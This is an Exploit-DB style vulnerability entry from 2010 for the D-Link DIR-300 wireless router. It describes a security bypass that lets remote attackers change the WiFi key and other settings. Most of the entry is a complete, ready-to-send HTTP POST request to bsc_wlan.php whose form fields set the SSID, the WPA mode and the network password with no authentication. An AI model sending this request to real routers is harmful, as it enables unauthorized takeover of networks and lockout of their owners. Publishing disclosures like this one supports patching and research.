D-Link DIR-300 - WiFi Key Security Bypass

EDB-ID:

35014

CVE:





Platform:

Hardware

Date:

2010-11-24


source: https://www.securityfocus.com/bid/45038/info

The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability.

Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks. 

POST http://www.example.com/bsc_wlan.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive

Content-Type: application/x-www-form-urlencoded
Content-Length: 1000

ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1=